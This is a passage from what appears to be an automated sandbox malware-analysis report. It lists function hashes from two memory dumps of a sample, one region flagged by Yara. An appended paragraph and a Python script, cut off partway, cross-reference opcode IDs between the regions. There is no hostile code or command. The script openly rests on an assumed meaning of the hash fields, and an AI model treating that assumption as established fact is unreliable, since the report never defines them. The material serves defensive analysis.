• Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
• Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
• Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
• Instruction ID: 47a1b40918eb53ed4352880b263286f11926337424ef871ed6198404b2b4a954
• Opcode Fuzzy Hash: e82c242e154504476aa0c4a283c83f7abe834146c9a10b5b44774a429600f0af
• Instruction Fuzzy Hash: 6AF146B1E403298BCF24CF58C8616AEB7B2FF85314F198169D8A6BF755E7349801CB91
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
• Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
• Opcode Fuzzy Hash: a69080f6ad1e69bdb89b54cb009ba2c83e518309b21ccd4fa82cf12907931cd9
• Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                • Instruction ID: ef494e1a66964b6bfd4b54c7df6664748d17fa419513b7b3881820c1404e8ab6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAF1CD316487418FC764CF29C88066BFBE6BFD9304F48982CE5D587751E636E849CB92
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                • Instruction ID: 6af0af9fd07dbea0327a8a302486079f3e258e751aa577ffaaa1b30c4ee5c47c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B129D61608BC28ED315CA3C8848756BFD16BA6228F1CC79DD0F94B3D3C27A9546C7A2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                • Instruction ID: 8620de11ec53a1bb62b6ba2282ec5ca41c9d2cf0185eb5cb8daa7a9337fedf78
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 192639fd68e41961d56c7569aed4b7f81ce7132f9cadfac3666f8de3caf69050
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD127C61608BC28ED315CA3C8848756BFD26BA6224F1CC79DD4F94B3D3C27AD546C7A2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                • Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                • Instruction ID: 4a1f5c0aec2b1864857774f339e35672471d9c065d8412942654b76754f62ef4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cec13f25c1f28221c4ff8f3f288699f7ddc068973911e15d4e3164317524c23
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38B134766887509FD3248B99C8C0ABFB7D2BB99310F1E993DD5C2A7691C3B09804C796
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                • Instruction ID: 0d04b2c2fa50837e9638c4fbed55210e4b06bf37a5b46dbaee5e4e245b9bea77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: acc099de19a44bf00ce16e18c4be42564cbb2e2978226dbcdc14d31531569d8c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91B15C717043614BEB18DF24E85266B77A2EB81304F5AC53EE8859B386D63CDC09C79A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                • Instruction ID: a8498cdc54b49a54ccad824e356f94892f2a3bdded662e083008d813c3ed6735
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91e403f7bf2fe428c8ff2ae1696841098b740060b83e87f0c1d5348c1599076f
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22B128B17843954FEB28CE248851BBB779AEF81304F09C53DE8858B385D736D909C791
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction ID: c845803a38f6c77acddbfa9eef1216980ece3764384c33bb2f9187d8778c445e
• Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction Fuzzy Hash: 2BF1C0F0904B40AFC3A5CF3AC942797BEECEB0A360F14491EF5AEC2241D73561458BA6
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction ID: 0c155b4e194a847bcd7227a96d39b03245999ce3adee6db801bfeb3d75141549
• Opcode Fuzzy Hash: 918cd65cbadabd6da86d83a30b2b2da0488193a68d8c3fca759c00fcea01beb3
• Instruction Fuzzy Hash: 5CF1C0F0914B40AFC3A5CF3AC946797BEECEB0A260F14491EF5EEC2641D73165458BA2
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction ID: 41c3e091da67547de47b3906f8a28cdcf4f9a35dde57214a1a091a27875e02c3
• Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction Fuzzy Hash: F0024861508BC18ED3268B3C8848A56BFD26BA6224F0DC79DD4E94F7E3C279D506C762
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction ID: 4611ac215784f38675ba720f7e280040a946bea9a546a14a108d328684a9cb92
• Opcode Fuzzy Hash: 455de48da1b395ee01d158247e6300201ea3688789ea299f7cc6c50f6c6940d8
• Instruction Fuzzy Hash: 8A021761508BC18ED326CB3C8848A16BFD26B66224F0EC79CD4E94B7E3D779D506C762
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
• Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
• Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
• Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
• Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
• Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
• Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
• Instruction ID: cb6cc02844bdacdf2647c895378169765fc783f564a9bc402d4d3c00ace9d1da
• Opcode Fuzzy Hash: 43a38f77119da688ac3ac81b48a3df6363d837cca15ab4ad9599a2e3d82993cc
• Instruction Fuzzy Hash: EAB1F536A583618BC728CF28C48056BB7F2FB89704F19852CFA8697765E7319C56CB81
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
• Instruction ID: 8a51dd8e2965cc9f0c4013a2f6a7698077ed2e8ce9dcff126952d1e9ceec8530
• Opcode Fuzzy Hash: 98cb35be4dcf6147bb54d841e08aa9a7e406920ae8f199def00657b733b42f8a
• Instruction Fuzzy Hash: EFB15579904301AFDB108F25DC41B5ABBE2BFD8314F144A3EF898932A1D776DD668B06
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
• Instruction ID: 0f409e261d9e0e0b34bca8056202dd50c7335d0811fa732e7108744841a4f4af
• Opcode Fuzzy Hash: 3c637dafc4c5c02bba21bf8384fb5f02d2acdfb7e2cfb5a4e70ebd11587584d3
• Instruction Fuzzy Hash: 46B10671548301AFD7249F25DC81B1ABBE2BFD8354F648A2CF498932E0D7B29925CF42
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                • Instruction ID: c4ecf2f7d150219de502610b6c81aee969d4f7df188b3b2bd5aaa2f9231b7f5b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd71efafbe3cc21deb18af7b1feb0adcacd6565e9113104d404282071b8f505b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E09114B2A443119BD7249F24C8A1BBBB3B5EF81718F05482CED869B380E775EC04C796
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                • Instruction ID: ff19ca43a3dbd87ba0595b2d5ed2b5feac7c6ac05064e4b4614c48bb82674ae3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d66196a234f06480f41816911af9b4ea699047e9e12ae4b8e975acb0d7698cc7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09A104729583118BC324CF24C8906ABF7E1FFD9754F1A8A2DE8C59B3A4E7749941C782
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                • Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                                                                                                                                                                                                • Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                • Instruction ID: 9d089b4936bc826f9e3e04b00b302834d30bf3138ff4b7f5ceda86475c5aff9e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73df037b7ed471f27b11ebbe38ccb4fbfbef165bc0754b8ed2e20a33442e0b7b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1A1D2366442218BC718DF28D99092BB3F2EFC5714F1A856CF9868B754DB31EC26CB81
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DBC15BB29087418FC360CF28DC96BABB7F1BF85318F09492DD1DAD6242E778A155CB46
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_20f0000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction ID: 7ee2f1e4c67bd946770ab34e1a53c651db6f09fe0b356cdb40b84778fdbadd77
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D6C18EB2A487418FC3A0CF68CC86BABB7E5FF85318F08492DD2D9C6642D779A155CB05
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                                                                                                                                                                                                                                                • Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 43914C72754B1A4BC714DE6CDC9066EB6D2ABD4210F4D423CD8958B3C2EF78AD0587C5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1719999080.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_SPFFah2O2q.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                • Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                                                                                                                                                                                                • Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16
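The listing above contains the same Opcode ID (bc4bfdbd75c9...) once in the PE-backed image dump at offset 00400000 and once in the non-PE-backed region at 020F0000 (the region carrying Yara matches), with different Instruction IDs. The following script is an added example, not part of the Joe Sandbox report, that parses entries in the format used on this page and reports Opcode IDs shared across dump regions; the sample input is copied from the entries above with fields not needed for the check omitted. It assumes that Opcode ID hashes only the opcode sequence while Instruction ID also covers operands (so an equal Opcode ID with a different Instruction ID indicates the same code skeleton with rebased operands); the report itself does not define these fields, so treat that reading as an assumption.

```python
"""Cross-reference Joe Sandbox function entries by Opcode ID across memory dumps.

Constructed input: the entries below are copied from the report listing on this
page, with fields not needed for the check left out. Assumption (not stated by
the report): Opcode ID hashes the opcode sequence only, Instruction ID also
covers operands.
"""
import re
from collections import defaultdict

REPORT_LISTING = """\
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: InitializeThunk
• Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
• Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
• Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
• Instruction ID: afe5d4654f5e8657962bc42cc500043a3620e9a043509faccf93fb76782c58a6
Memory Dump Source
• Source File: 00000000.00000002.1722458001.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020F0000, based on PE: false
• API ID:
• Opcode ID: bc4bfdbd75c94b69f0a0099a9aec3f3e1abf52cef7a5ad0f4f638173c0b64b08
• Instruction ID: 7ee2f1e4c67bd946770ab34e1a53c651db6f09fe0b356cdb40b84778fdbadd77
Memory Dump Source
• Source File: 00000000.00000002.1719999080.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
• Opcode ID: eca7b8087cccba19e5979cf0e8330dd1936bd6a3fecaafeec36cf51b3ab145d2
• Instruction ID: 652f8e9b795bdad566c10a3835dfc4d237c9f110778e3a4e594c84154d78986c
"""

# "• Key: value" bullet lines; the key is everything up to the first colon.
FIELD_RE = re.compile(r"^•\s*([^:]+?):\s*(.*)$")
# Tail of the "Source File" value: dump offset and whether the region is PE-backed.
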